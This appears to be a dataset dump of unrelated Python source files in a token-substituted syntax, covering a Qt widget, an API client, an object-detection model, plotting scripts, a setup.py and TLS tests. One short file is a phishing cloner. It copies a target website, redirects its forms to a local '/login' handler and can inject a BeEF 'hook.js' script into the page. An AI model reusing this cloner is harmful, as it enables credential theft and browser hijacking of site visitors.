content
stringlengths
0
1.55M
<import_from_stmt>PyQt5.QtWidgets QTabWidget<import_from_stmt>....Common.DyStockCommon *<import_from_stmt>.DyStockDataIndexConsecutiveDayLineStatsWidget *<class_stmt>DyStockDataIndexConsecutiveDayLineStatsTabWidget(QTabWidget)<block_start><def_stmt>__init__ self dataWindow startDate endDate indexCountedDfs greenLine=<true><block_start>super().__init__()<for_stmt>index,df indexCountedDfs.items()<block_start>self.addTab(DyStockDataIndexConsecutiveDayLineStatsWidget(dataWindow index df) DyStockCommon.indexes[index])<block_end>self.setWindowTitle('指数连续日{0}线统计[{1},{2}]'.format('阴'<if>greenLine<else>'阳' startDate endDate))<block_end><block_end>
<import_stmt>os<import_stmt>time<import_stmt>io<import_stmt>sys<import_stmt>json<import_stmt>requests<import_stmt>jsonschema<import_from_stmt>exceptions InvalidUrlConfiguration ApplicationError<class_stmt>ApiClient<block_start><def_stmt>__init__ self<block_start>self.configuration=[]<line_sep>self.url_list=self.get_url_configuration()<line_sep>self.get_api_configuration()<block_end><def_stmt>get_configuration self<block_start><try_stmt><block_start><return>self.configuration<block_end><except_stmt>ApplicationError<as>e<block_start><raise>e<block_end><block_end>@staticmethod<def_stmt>get_url_configuration <block_start>""" :return: List of all the api urls provided in the url_configuration file """<with_stmt>open('../jsonFiles/url_configuration.json')<as>f<block_start>data=json.load(f)<line_sep>urls=data["urls"]<try_stmt><block_start>validate_url_configuration(data)<block_end><except_stmt>Exception<as>e<block_start><raise>InvalidUrlConfiguration<block_end><return>urls<block_end><block_end><def_stmt>get_api_configuration self<block_start><for_stmt>url self.url_list<block_start>self.get_models(url)<block_end><block_end>@staticmethod<def_stmt>get_model_names url:str<block_start>time.sleep(5)<line_sep>response=requests.get(url=url+"models")<line_sep>models_list=response.json()["data"]["models"]<line_sep><return>models_list<block_end><def_stmt>get_models self url:str<block_start>""" Returns a list of json objects representing the configuration of each api corresponding to each url in the url_configuration file :param url: Each url in the url_configuration file :return: List of json objects """<line_sep>models_list=self.get_model_names(url)<for_stmt>model_name models_list<block_start>labels_list=self.get_labels(url model_name)<line_sep>model_type=self.get_model_configuration(url model_name)<line_sep>palette=<none><if_stmt>"segmentation"<in>model_type<block_start>palette=self.get_palette(url model_name)<block_end>self.configuration.append({"name":model_name "labels":labels_list "type":model_type "url":url "palette":palette})<block_end><block_end>@staticmethod<def_stmt>get_palette url:str model_name:str<block_start>response=requests.get(url=url+"models/"+model_name+"/palette")<line_sep><return>response.json()["data"]<block_end>@staticmethod<def_stmt>get_labels url:str model_name:str<block_start>response=requests.get(url=url+"models/"+model_name+"/labels")<line_sep><return>response.json()["data"]<block_end>@staticmethod<def_stmt>get_model_configuration url:str model_name:str<block_start>response=requests.get(url=url+"models/"+model_name+"/config")<line_sep><return>response.json()["data"]["type"]<block_end>@staticmethod<def_stmt>get_detection_response url:str model_name:str im<block_start>response=requests.post(url=url+"models/"+model_name+"/predict" files={'input_data':io.BytesIO(im.tobytes())})<line_sep><return>response.json()<block_end>@staticmethod<def_stmt>get_segmentation_response url:str model_name:str im<block_start>response=requests.post(url=url+"models/"+model_name+"/inference" files={'input_data':io.BytesIO(im.tobytes())})<line_sep><return>response<block_end><block_end><def_stmt>validate_url_configuration data<block_start>""" Validate the url_configuration file by comparing it to the urlConfigurationSchema :param data: The data from the url_configuration file """<with_stmt>open('urlConfigurationSchema')<as>f<block_start>schema=json.load(f)<block_end><try_stmt><block_start>jsonschema.validate(data schema)<block_end><except_stmt>Exception<as>e<block_start><raise>InvalidUrlConfiguration(e)<block_end><block_end>
<import_stmt>requests<import_stmt>re<import_stmt>os<line_sep># CLONING FUNCTIONS -------------------------------------------------------------------------------------------- <def_stmt>clone url user_agent beef<block_start><try_stmt><block_start>u=url.replace('://' '-')<line_sep>q='templates/fake/{}/{}'.format(user_agent u)<line_sep>os.makedirs(q exist_ok=<true>)<line_sep>temp_ind_path='templates/fake/{}/{}/index.html'.format(user_agent u)<line_sep>headers={'User-Agent':user_agent}<line_sep>r=requests.get(url headers=headers)<line_sep>html=r.text<line_sep>old_regular=re.findall(r'action="([^ >"]*)"' html)<line_sep>new_regular='/login'<for_stmt>r old_regular<block_start>print(r)<line_sep>html=html.replace(r new_regular)<block_end><if_stmt>beef<eq>'yes'<block_start>inject='<script src=":3000/hook.js" type="text/javascript"></script></body>'<line_sep>html=html.replace("</body>" inject)<block_end>new_html=open(temp_ind_path 'w')<line_sep>new_html.write(html.encode('ascii' 'ignore').decode('ascii'))<line_sep>new_html.close()<block_end><except_stmt><block_start><pass><block_end><block_end>#--------------------------------------------------------------------------------------------------------------------
<import_stmt>numpy<as>np<import_stmt>scipy.linalg<as>la<import_from_stmt>auxiliary *<line_sep>a=np.matrix([[+3 +0 -3 +0] [+0 +3 +1 +2] [-3 +1 +4 +1] [+0 +2 +1 +3] ] dtype=float)<line_sep>res=la.cholesky(a lower=<false>)<line_sep>mprint('aUp' res)<line_sep>res=la.cholesky(a lower=<true>)<line_sep>mprint('aLo' res)<line_sep>
<import_from_future_stmt> division<import_stmt>torch<import_stmt>torch.nn<as>nn<import_from_stmt>.base BaseDetector<import_from_stmt>.test_mixins RPNTestMixin<import_from_stmt>.. builder<import_from_stmt>..registry DETECTORS<import_from_stmt>mmdet.core assign_and_sample bbox2roi bbox2result multi_apply merge_aug_masks <import_stmt>numpy<as>np<import_stmt>pickle<import_from_stmt>..utils ConvModule<import_stmt>torch.nn.functional<as>F<line_sep>@DETECTORS.register_module<class_stmt>ReasoningRCNN(BaseDetector RPNTestMixin)<block_start><def_stmt>__init__ self num_stages backbone neck=<none> upper_neck=<none> rpn_head=<none> bbox_roi_extractor=<none> bbox_head=<none> mask_roi_extractor=<none> mask_head=<none> train_cfg=<none> test_cfg=<none> pretrained=<none> adj_gt=<none> graph_out_channels=256 normalize=<none> roi_feat_size=7 shared_num_fc=2<block_start><assert_stmt>bbox_roi_extractor<is><not><none><assert_stmt>bbox_head<is><not><none><line_sep>super(ReasoningRCNN self).__init__()<line_sep>self.num_stages=num_stages<line_sep>self.backbone=builder.build_backbone(backbone)<if_stmt>neck<is><not><none><block_start>self.neck=builder.build_neck(neck)<block_end><else_stmt><block_start><assert_stmt>upper_neck<is><not><none><block_end><if_stmt>rpn_head<is><not><none><block_start>self.rpn_head=builder.build_rpn_head(rpn_head)<block_end><if_stmt>upper_neck<is><not><none><block_start><if_stmt>isinstance(upper_neck list)<block_start>self.upper_neck=nn.ModuleList()<assert_stmt>len(upper_neck)<eq>self.num_stages<for_stmt>neck upper_neck<block_start>self.upper_neck.append(builder.build_upper_neck(neck))<block_end><block_end><else_stmt><block_start>self.upper_neck=builder.build_upper_neck(upper_neck)<block_end><block_end><if_stmt>bbox_head<is><not><none><block_start>self.bbox_roi_extractor=nn.ModuleList()<line_sep>self.bbox_head=nn.ModuleList()<if_stmt><not>isinstance(bbox_roi_extractor list)<block_start>bbox_roi_extractor=[bbox_roi_extractor<for>_ range(num_stages)]<block_end><if_stmt><not>isinstance(bbox_head list)<block_start>bbox_head=[bbox_head<for>_ range(num_stages)]<block_end><assert_stmt>len(bbox_roi_extractor)<eq>len(bbox_head)<eq>self.num_stages<for_stmt>roi_extractor,head zip(bbox_roi_extractor bbox_head)<block_start>self.bbox_roi_extractor.append(builder.build_roi_extractor(roi_extractor))<line_sep>self.bbox_head.append(builder.build_bbox_head(head))<block_end><block_end><if_stmt>mask_head<is><not><none><block_start>self.mask_head=nn.ModuleList()<if_stmt><not>isinstance(mask_head list)<block_start>mask_head=[mask_head<for>_ range(num_stages)]<block_end><assert_stmt>len(mask_head)<eq>self.num_stages<for_stmt>head mask_head<block_start>self.mask_head.append(builder.build_mask_head(head))<block_end><if_stmt>mask_roi_extractor<is><not><none><block_start>self.mask_roi_extractor=nn.ModuleList()<if_stmt><not>isinstance(mask_roi_extractor list)<block_start>mask_roi_extractor=[mask_roi_extractor<for>_ range(num_stages)]<block_end><assert_stmt>len(mask_roi_extractor)<eq>self.num_stages<for_stmt>roi_extractor mask_roi_extractor<block_start>self.mask_roi_extractor.append(builder.build_roi_extractor(roi_extractor))<block_end><block_end><block_end>self.normalize=normalize<line_sep>self.with_bias=normalize<is><none><if_stmt>adj_gt<is><not><none><block_start>self.adj_gt=pickle.load(open(adj_gt 'rb'))<line_sep>self.adj_gt=np.float32(self.adj_gt)<line_sep>self.adj_gt=nn.Parameter(torch.from_numpy(self.adj_gt) requires_grad=<false>)<block_end># init cmp attention self.cmp_attention=nn.ModuleList()<line_sep>self.cmp_attention.append(ConvModule(1024 1024<floordiv>16 3 stride=2 padding=1 normalize=self.normalize bias=self.with_bias))<line_sep>self.cmp_attention.append(nn.Linear(1024<floordiv>16 bbox_head[0]['in_channels']+1))<line_sep># init graph w self.graph_out_channels=graph_out_channels<line_sep>self.graph_weight_fc=nn.Linear(bbox_head[0]['in_channels']+1 self.graph_out_channels)<line_sep>self.relu=nn.ReLU(inplace=<true>)<line_sep># shared upper neck in_channels=rpn_head['in_channels']<if_stmt>shared_num_fc<g>0<block_start>in_channels<augmul>(roi_feat_size<times>roi_feat_size)<block_end>self.branch_fcs=nn.ModuleList()<for_stmt>i range(shared_num_fc)<block_start>fc_in_channels=(in_channels<if>i<eq>0<else>bbox_head[0]['in_channels'])<line_sep>self.branch_fcs.append(nn.Linear(fc_in_channels bbox_head[0]['in_channels']))<block_end>self.train_cfg=train_cfg<line_sep>self.test_cfg=test_cfg<line_sep>self.init_weights(pretrained=pretrained)<block_end>@property<def_stmt>with_rpn self<block_start><return>hasattr(self 'rpn_head')<and>self.rpn_head<is><not><none><block_end><def_stmt>init_weights self pretrained=<none><block_start>super(ReasoningRCNN self).init_weights(pretrained)<line_sep>self.backbone.init_weights(pretrained=pretrained)<if_stmt>self.with_neck<block_start><if_stmt>isinstance(self.neck nn.Sequential)<block_start><for_stmt>m self.neck<block_start>m.init_weights()<block_end><block_end><else_stmt><block_start>self.neck.init_weights()<block_end><block_end><if_stmt>self.with_rpn<block_start>self.rpn_head.init_weights()<block_end><for_stmt>i range(self.num_stages)<block_start><if_stmt>self.with_bbox<block_start>self.bbox_roi_extractor[i].init_weights()<line_sep>self.bbox_head[i].init_weights()<block_end><if_stmt>self.with_mask_roi_extractor<block_start>self.mask_roi_extractor[i].init_weights()<block_end><if_stmt>self.with_mask<block_start>self.mask_head[i].init_weights()<block_end><block_end><block_end><def_stmt>extract_feat self img<block_start>x=self.backbone(img)<if_stmt>self.with_neck<block_start>x=self.neck(x)<block_end><return>x<block_end><def_stmt>forward_upper_neck self x stage<block_start><if_stmt>self.with_share_upper_neck<block_start>x=self.upper_neck(x)<block_end><elif_stmt>self.with_unshare_upper_neck<block_start>x=self.upper_neck[stage](x)<block_end><return>x<block_end><def_stmt>forward_train self img img_meta gt_bboxes gt_bboxes_ignore gt_labels gt_masks=<none> proposals=<none><block_start>x=self.extract_feat(img)<line_sep># precmp attention <if_stmt>len(x)<g>1<block_start>base_feat=[]<for_stmt>b_f x[1:]<block_start>base_feat.append(F.interpolate(b_f scale_factor=(x[2].size(2)/b_f.size(2) x[2].size(3)/b_f.size(3))))<block_end>base_feat=torch.cat(base_feat 1)<block_end><else_stmt><block_start>base_feat=torch.cat(x 1)<block_end><for_stmt>ops self.cmp_attention<block_start>base_feat=ops(base_feat)<if_stmt>len(base_feat.size())<g>2<block_start>base_feat=base_feat.mean(3).mean(2)<block_end><else_stmt><block_start>base_feat=self.relu(base_feat)<block_end><block_end>losses=dict()<if_stmt>self.with_rpn<block_start>rpn_outs=self.rpn_head(x)<line_sep>rpn_loss_inputs=rpn_outs+(gt_bboxes img_meta self.train_cfg.rpn)<line_sep>rpn_losses=self.rpn_head.loss(*rpn_loss_inputs)<line_sep>losses.update(rpn_losses)<line_sep>proposal_inputs=rpn_outs+(img_meta self.test_cfg.rpn)<line_sep>proposal_list=self.rpn_head.get_proposals(*proposal_inputs)<block_end><else_stmt><block_start>proposal_list=proposals<block_end><for_stmt>i range(self.num_stages)<block_start>rcnn_train_cfg=self.train_cfg.rcnn[i]<line_sep>lw=self.train_cfg.stage_loss_weights[i]<line_sep># add reasoning process <if_stmt>i<g>0# 1.build global semantic pool <block_start>global_semantic_pool=torch.cat((bbox_head.fc_cls.weight bbox_head.fc_cls.bias.unsqueeze(1)) 1).detach()<line_sep># 2.compute graph attention attention_map=nn.Softmax(1)(torch.mm(base_feat torch.transpose(global_semantic_pool 0 1)))<line_sep># 3.adaptive global reasoning alpha_em=attention_map.unsqueeze(-1)<times>torch.mm(self.adj_gt global_semantic_pool).unsqueeze(0)<line_sep>alpha_em=alpha_em.view(-1 global_semantic_pool.size(-1))<line_sep>alpha_em=self.graph_weight_fc(alpha_em)<line_sep>alpha_em=self.relu(alpha_em)<line_sep># enhanced_feat = torch.mm(nn.Softmax(1)(cls_score), alpha_em) n_classes=bbox_head.fc_cls.weight.size(0)<line_sep>cls_prob=nn.Softmax(1)(cls_score).view(len(img_meta) -1 n_classes)<line_sep>enhanced_feat=torch.bmm(cls_prob alpha_em.view(len(img_meta) -1 self.graph_out_channels))<line_sep>enhanced_feat=enhanced_feat.view(-1 self.graph_out_channels)<line_sep># assign gts and sample proposals <block_end>assign_results,sampling_results=multi_apply(assign_and_sample proposal_list gt_bboxes gt_bboxes_ignore gt_labels cfg=rcnn_train_cfg)<line_sep># bbox head forward and loss bbox_roi_extractor=self.bbox_roi_extractor[i]<line_sep>bbox_head=self.bbox_head[i]<line_sep>rois,rois_index=bbox2roi([(res.pos_bboxes res.neg_bboxes)<for>res sampling_results] return_index=<true>)<line_sep>bbox_feats=bbox_roi_extractor(x[:bbox_roi_extractor.num_inputs] rois)<line_sep># without upperneck bbox_feats=bbox_feats.view(bbox_feats.size(0) -1)<for_stmt>fc self.branch_fcs<block_start>bbox_feats=self.relu(fc(bbox_feats))<block_end># cat with enhanced feature <if_stmt>i<g>0<block_start>bbox_feats=torch.cat([bbox_feats enhanced_feat] 1)<block_end>cls_score,bbox_pred=bbox_head(bbox_feats)<line_sep>bbox_targets=bbox_head.get_target(sampling_results gt_bboxes gt_labels rcnn_train_cfg)<line_sep>loss_bbox=bbox_head.loss(cls_score bbox_pred *bbox_targets)<for_stmt>name,value loss_bbox.items()<block_start>losses['s{}.{}'.format(i name)]=(value<times>lw<if>'loss'<in>name<else>value)<block_end># mask head forward and loss <if_stmt>self.with_mask<block_start><if_stmt>self.with_mask_roi_extractor<block_start>mask_roi_extractor=self.mask_roi_extractor[i]<line_sep>pos_rois=bbox2roi([res.pos_bboxes<for>res sampling_results])<line_sep>mask_feats=mask_roi_extractor(x[:mask_roi_extractor.num_inputs] pos_rois)<line_sep>mask_feats=self.forward_upper_neck(mask_feats i)<block_end><else_stmt><block_start>pos_inds=(rois_index<eq>0)<line_sep>mask_feats=bbox_feats[pos_inds]<block_end>mask_head=self.mask_head[i]<line_sep>mask_pred=mask_head(mask_feats)<line_sep>mask_targets=mask_head.get_target(sampling_results gt_masks rcnn_train_cfg)<line_sep>pos_labels=torch.cat([res.pos_gt_labels<for>res sampling_results])<line_sep>loss_mask=mask_head.loss(mask_pred mask_targets pos_labels)<for_stmt>name,value loss_mask.items()<block_start>losses['s{}.{}'.format(i name)]=(value<times>lw<if>'loss'<in>name<else>value)<block_end><block_end># refine bboxes <if_stmt>i<l>self.num_stages-1<block_start>pos_is_gts=[res.pos_is_gt<for>res sampling_results]<line_sep>roi_labels=bbox_targets[0]# bbox_targets is a tuple <with_stmt>torch.no_grad()<block_start>proposal_list=bbox_head.refine_bboxes(rois roi_labels bbox_pred pos_is_gts img_meta)<block_end><block_end><block_end><return>losses<block_end><def_stmt>simple_test self img img_meta proposals=<none> rescale=<false><block_start>x=self.extract_feat(img)<line_sep># precmp attention <if_stmt>len(x)<g>1<block_start>base_feat=[]<for_stmt>b_f x[1:]<block_start>base_feat.append(F.interpolate(b_f scale_factor=(x[2].size(2)/b_f.size(2) x[2].size(3)/b_f.size(3))))<block_end>base_feat=torch.cat(base_feat 1)<block_end><else_stmt><block_start>base_feat=torch.cat(x 1)<block_end><for_stmt>ops self.cmp_attention<block_start>base_feat=ops(base_feat)<if_stmt>len(base_feat.size())<g>2<block_start>base_feat=base_feat.mean(3).mean(2)<block_end><else_stmt><block_start>base_feat=self.relu(base_feat)<block_end><block_end>proposal_list=self.simple_test_rpn(x img_meta self.test_cfg.rpn)<if>proposals<is><none><else>proposals<line_sep>img_shape=img_meta[0]['img_shape']<line_sep>ori_shape=img_meta[0]['ori_shape']<line_sep>scale_factor=img_meta[0]['scale_factor']<line_sep># "ms" in variable names means multi-stage ms_bbox_result={}<line_sep>ms_segm_result={}<line_sep>ms_scores=[]<line_sep>rcnn_test_cfg=self.test_cfg.rcnn<line_sep>rois=bbox2roi(proposal_list)<for_stmt>i range(self.num_stages)# add reasoning process <block_start><if_stmt>i<g>0# transform CxC classes graph to region # 1.build global semantic pool <block_start>global_semantic_pool=torch.cat((bbox_head.fc_cls.weight bbox_head.fc_cls.bias.unsqueeze(1)) 1).detach()<line_sep># 2.compute graph attention attention_map=nn.Softmax(1)(torch.mm(base_feat torch.transpose(global_semantic_pool 0 1)))<line_sep># 3.adaptive global reasoning alpha_em=attention_map.unsqueeze(-1)<times>torch.mm(self.adj_gt global_semantic_pool).unsqueeze(0)<line_sep>alpha_em=alpha_em.view(-1 global_semantic_pool.size(-1))<line_sep>alpha_em=self.graph_weight_fc(alpha_em)<line_sep>alpha_em=self.relu(alpha_em)<line_sep>n_classes=bbox_head.fc_cls.weight.size(0)<line_sep>cls_prob=nn.Softmax(1)(cls_score).view(len(img_meta) -1 n_classes)<line_sep>enhanced_feat=torch.bmm(cls_prob alpha_em.view(len(img_meta) -1 self.graph_out_channels))<line_sep>enhanced_feat=enhanced_feat.view(-1 self.graph_out_channels)<block_end>bbox_roi_extractor=self.bbox_roi_extractor[i]<line_sep>bbox_head=self.bbox_head[i]<line_sep>bbox_feats=bbox_roi_extractor(x[:len(bbox_roi_extractor.featmap_strides)] rois)<line_sep># bbox_feats = self.forward_upper_neck(bbox_feats, i) # without upperneck bbox_feats=bbox_feats.view(bbox_feats.size(0) -1)<for_stmt>fc self.branch_fcs<block_start>bbox_feats=self.relu(fc(bbox_feats))<block_end># cat with enhanced feature <if_stmt>i<g>0<block_start>bbox_feats=torch.cat([bbox_feats enhanced_feat] 1)<block_end>cls_score,bbox_pred=bbox_head(bbox_feats)<line_sep>ms_scores.append(cls_score)<if_stmt>self.test_cfg.keep_all_stages<block_start>det_bboxes,det_labels=bbox_head.get_det_bboxes(rois cls_score bbox_pred img_shape scale_factor rescale=rescale cfg=rcnn_test_cfg)<line_sep>bbox_result=bbox2result(det_bboxes det_labels bbox_head.num_classes)<line_sep>ms_bbox_result['stage{}'.format(i)]=bbox_result<if_stmt>self.with_mask<block_start><if_stmt>self.with_mask_roi_extractor<block_start>mask_roi_extractor=self.mask_roi_extractor[i]<block_end><else_stmt><block_start>mask_roi_extractor=self.bbox_roi_extractor[i]<block_end>mask_head=self.mask_head[i]<if_stmt>det_bboxes.shape[0]<eq>0<block_start>segm_result=[[]<for>_ range(mask_head.num_classes-1)]<block_end><else_stmt><block_start>_bboxes=(det_bboxes[: :4]<times>scale_factor<if>rescale<else>det_bboxes)<line_sep>mask_rois=bbox2roi([_bboxes])<line_sep>mask_feats=mask_roi_extractor(x[:len(mask_roi_extractor.featmap_strides)] mask_rois)<line_sep>mask_feats=self.forward_upper_neck(mask_feats i)<line_sep>mask_pred=mask_head(mask_feats)<line_sep>segm_result=mask_head.get_seg_masks(mask_pred _bboxes det_labels rcnn_test_cfg ori_shape scale_factor rescale)<block_end>ms_segm_result['stage{}'.format(i)]=segm_result<block_end><block_end><if_stmt>i<l>self.num_stages-1<block_start>bbox_label=cls_score.argmax(dim=1)<line_sep>rois=bbox_head.regress_by_class(rois bbox_label bbox_pred img_meta[0])<block_end><block_end>cls_score=sum(ms_scores)/self.num_stages<line_sep>det_bboxes,det_labels=self.bbox_head[-1].get_det_bboxes(rois cls_score bbox_pred img_shape scale_factor rescale=rescale cfg=rcnn_test_cfg)<line_sep>bbox_result=bbox2result(det_bboxes det_labels self.bbox_head[-1].num_classes)<line_sep>ms_bbox_result['ensemble']=bbox_result<if_stmt>self.with_mask<block_start><if_stmt>det_bboxes.shape[0]<eq>0<block_start>segm_result=[[]<for>_ range(self.mask_head[-1].num_classes-1)]<block_end><else_stmt><block_start>_bboxes=(det_bboxes[: :4]<times>scale_factor<if>rescale<else>det_bboxes)<line_sep>mask_rois=bbox2roi([_bboxes])<line_sep>aug_masks=[]<for_stmt>i range(self.num_stages)<block_start><if_stmt>self.with_mask_roi_extractor<block_start>mask_roi_extractor=self.mask_roi_extractor[i]<block_end><else_stmt><block_start>mask_roi_extractor=self.bbox_roi_extractor[i]<block_end>mask_feats=mask_roi_extractor(x[:len(mask_roi_extractor.featmap_strides)] mask_rois)<line_sep>mask_feats=self.forward_upper_neck(mask_feats i)<line_sep>mask_pred=self.mask_head[i](mask_feats)<line_sep>aug_masks.append(mask_pred.sigmoid().cpu().numpy())<block_end>merged_masks=merge_aug_masks(aug_masks [img_meta]<times>self.num_stages self.test_cfg.rcnn)<line_sep>segm_result=self.mask_head[-1].get_seg_masks(merged_masks _bboxes det_labels rcnn_test_cfg ori_shape scale_factor rescale)<block_end>ms_segm_result['ensemble']=segm_result<block_end><if_stmt><not>self.test_cfg.keep_all_stages<block_start><if_stmt>self.with_mask<block_start>results=(ms_bbox_result['ensemble'] ms_segm_result['ensemble'])<block_end><else_stmt><block_start>results=ms_bbox_result['ensemble']<block_end><block_end><else_stmt><block_start><if_stmt>self.with_mask<block_start>results={stage:(ms_bbox_result[stage] ms_segm_result[stage])<for>stage ms_bbox_result}<block_end><else_stmt><block_start>results=ms_bbox_result<block_end><block_end><return>results<block_end><def_stmt>aug_test self img img_meta proposals=<none> rescale=<false><block_start><raise>NotImplementedError<block_end><def_stmt>show_result self data result img_norm_cfg **kwargs<block_start><if_stmt>self.with_mask<block_start>ms_bbox_result,ms_segm_result=result<if_stmt>isinstance(ms_bbox_result dict)<block_start>result=(ms_bbox_result['ensemble'] ms_segm_result['ensemble'])<block_end><block_end><else_stmt><block_start><if_stmt>isinstance(result dict)<block_start>result=result['ensemble']<block_end><block_end>super(ReasoningRCNN self).show_result(data result img_norm_cfg **kwargs)<block_end><block_end>
"""Scrapes grapheme-to-phoneme data from Wiktionary."""<import_stmt>pkg_resources<import_from_stmt>wikipron.config Config<import_from_stmt>wikipron.scrape scrape<line_sep>__version__=pkg_resources.get_distribution("wikipron").version<line_sep>__all__=["__version__" "Config" "scrape"]<line_sep>
# ----------------------------------------------------------------------------- # Matplotlib cheat sheet # Released under the BSD License # ----------------------------------------------------------------------------- <import_stmt>numpy<as>np<import_stmt>matplotlib<as>mpl<import_stmt>matplotlib.pyplot<as>plt<line_sep>fig=plt.figure(figsize=(4 4))<line_sep>ax=fig.add_axes([0.15 0.15 .7 .7] frameon=<true> aspect=1 xticks=[] yticks=[])<def_stmt>text x y _text<block_start>color="C1"<if_stmt><not>0<l>x<l>1<or><not>0<l>y<l>1<block_start>color="C0"<block_end>size=0.15<line_sep>ax.text(x y _text color="white" # bbox={"color": "C1"}, size="xx-large" weight="bold" ha="center" va="center")<line_sep>rect=plt.Rectangle((x-size/2 y-size/2) size size facecolor=color zorder=-10 clip_on=<false>)<line_sep>ax.add_patch(rect)<block_end><def_stmt>point x y<block_start>ax.scatter([x] [y] facecolor="C0" edgecolor="white" zorder=10 clip_on=<false>)<block_end>d=.1<line_sep>e=.15/2<line_sep>text(d d "3") text(0.5 d "8") text(1-d d "4")<line_sep>text(d 0.5 "6") text(0.5 0.5 "10") text(1-d 0.5 "7")<line_sep>text(d 1-d "2") text(0.5 1-d "9") text(1-d 1-d "1")<line_sep>text(-d 1-d "A") text(-d 0.5 "B") text(-d d "C")<line_sep>point(-d+e 1-d+e) point(-d+e 0.5) point(-d+e d-e) <line_sep>text(d -d "D") text(0.5 -d "E") text(1-d -d "F")<line_sep>point(d-e -d+e) point(0.5 -d+e) point(1-d+e -d+e) <line_sep>text(1+d d "G") text(1+d 0.5 "H") text(1+d 1-d "I")<line_sep>point(1+d-e d-e) point(1+d-e .5) point(1+d-e 1-d+e) <line_sep>text(1-d 1+d "J") text(0.5 1+d "K") text(d 1+d "L")<line_sep>point(1-d+e 1+d-e) point(0.5 1+d-e) point(d-e 1+d-e) <line_sep>plt.xlim(0 1) plt.ylim(0 1)<line_sep>plt.savefig("../figures/legend-placement.pdf")<line_sep># plt.show()
<import_stmt>io<import_stmt>os<import_stmt>re<import_from_stmt>setuptools find_packages<import_from_stmt>setuptools setup<import_from_stmt>bustag __version__<def_stmt>read filename<block_start>filename=os.path.join(os.path.dirname(__file__) filename)<line_sep>text_type=type(u"")<with_stmt>io.open(filename mode="r" encoding='utf-8')<as>fd<block_start><return>re.sub(text_type(r':[a-z]+:`~?(.*?)`') text_type(r'``\1``') fd.read())<block_end><block_end>setup(name="bustag" version=__version__ url="https://github.com/gxtrobot/bustag" license='MIT' author="gxtrobot" author_email="<EMAIL>" description="a tag and recommend system for old bus driver" long_description=read("README.md") packages=find_packages(exclude=('tests' )) install_requires=[] classifiers=['Development Status :: 2 - Pre-Alpha' 'License :: OSI Approved :: MIT License' 'Programming Language :: Python' 'Programming Language :: Python :: 2' 'Programming Language :: Python :: 2.7' 'Programming Language :: Python :: 3' 'Programming Language :: Python :: 3.4' 'Programming Language :: Python :: 3.5' 'Programming Language :: Python :: 3.6' 'Programming Language :: Python :: 3.7' ] )<line_sep>
# This file is part of the Python aiocoap library project. # # Copyright (c) 2012-2014 <NAME> <http://sixpinetrees.blogspot.com/>, # 2013-2014 <NAME> <<EMAIL>> # # aiocoap is free software, this file is published under the MIT license as # described in the accompanying LICENSE file. <import_stmt>json<import_stmt>tempfile<import_stmt>shutil<import_stmt>subprocess<import_stmt>unittest<import_stmt>sys<import_stmt>aiocoap<import_from_stmt>.test_server WithClient WithTestServer run_fixture_as_standalone_server<import_from_stmt>.fixtures no_warnings asynctest<import_from_stmt>.common tcp_disabled<line_sep>IS_STANDALONE=<false><class_stmt>WithTLSServer(WithTestServer)<block_start><def_stmt>setUp self<block_start>self.keydir=tempfile.mkdtemp(suffix="-testkeypair")<line_sep>self.keyfile=self.keydir+'/key.pem'<line_sep>self.certfile=self.keydir+'/cert.pem'<line_sep>self.credentialsfile=self.keydir+'/credentials.json'<line_sep>subprocess.check_call(['openssl' 'req' '-x509' '-newkey' 'rsa:4096' '-keyout' self.keyfile '-out' self.certfile '-days' '5' '-nodes' '-subj' '/CN=%s'%self.servernamealias] stderr=subprocess.DEVNULL )<line_sep># Write out for the benefit of standalone clients during debugging <with_stmt>open(self.credentialsfile 'w')<as>of<block_start>json.dump({'coaps+tcp://%s/*'%self.servernamealias:{'tlscert':{'certfile':self.certfile}}} of)<block_end><if_stmt>IS_STANDALONE<block_start>print("To test, run ./aiocoap-client coaps+tcp://%s/whoami --credentials %s"%(self.servernamealias self.credentialsfile ))<block_end>super().setUp()<block_end><def_stmt>tearDown self<block_start>super().tearDown()<line_sep>shutil.rmtree(self.keydir)<block_end><def_stmt>get_server_ssl_context self<block_start><import_stmt>ssl<line_sep># FIXME: copied from aiocoap.cli.common ssl_context=ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)<line_sep>ssl_context.load_cert_chain(certfile=self.certfile keyfile=self.keyfile)<line_sep>ssl_context.set_alpn_protocols(["coap"])<if_stmt>hasattr(ssl_context 'sni_callback')# starting python 3.7 <block_start>ssl_context.sni_callback=<lambda>obj name context:setattr(obj "indicated_server_name" name)<block_end><return>ssl_context<block_end><block_end><class_stmt>WithTLSClient(WithClient)# This expects that something -- typically the colocated WithTestServer -- sets certfile first <block_start><def_stmt>setUp self<block_start>super().setUp()<line_sep>self.client.client_credentials['coaps+tcp://%s/*'%self.servernamealias]=aiocoap.credentials.TLSCert(certfile=self.certfile)<block_end><block_end>@unittest.skipIf(tcp_disabled "TCP disabled in environment")<class_stmt>TestTLS(WithTLSServer WithTLSClient)<block_start>@no_warnings@asynctest<async_keyword><def_stmt>test_tls self<block_start>request=aiocoap.Message(code=aiocoap.GET)<line_sep>request.set_request_uri('coaps+tcp://%s/whoami'%self.servernamealias set_uri_host=<false>)<line_sep>response=<await>self.client.request(request).response_raising<line_sep>response=json.loads(response.payload)<line_sep>self.assertEqual(response['requested_uri'] 'coaps+tcp://%s/whoami'%self.servernamealias "SNI name was not used by the server")<block_end><if_stmt>sys.version_info<l>(3 7)<block_start>test_tls=unittest.expectedFailure(test_tls)# SNI support was only added in Python 3.7 <block_end><if_stmt>'PyPy'<in>sys.version# For PyPy exclusion, see https://foss.heptapod.net/pypy/pypy/-/issues/3359 # Completely skipping a test that causes segfaults <block_start>test_tls=<none><block_end><block_end><if_stmt>__name__<eq>"__main__"# due to the imports, you'll need to run this as `python3 -m tests.test_server` <block_start>IS_STANDALONE=<true><import_stmt>logging<line_sep>logging.basicConfig(level=logging.DEBUG)<line_sep>run_fixture_as_standalone_server(TestTLS)<block_end>
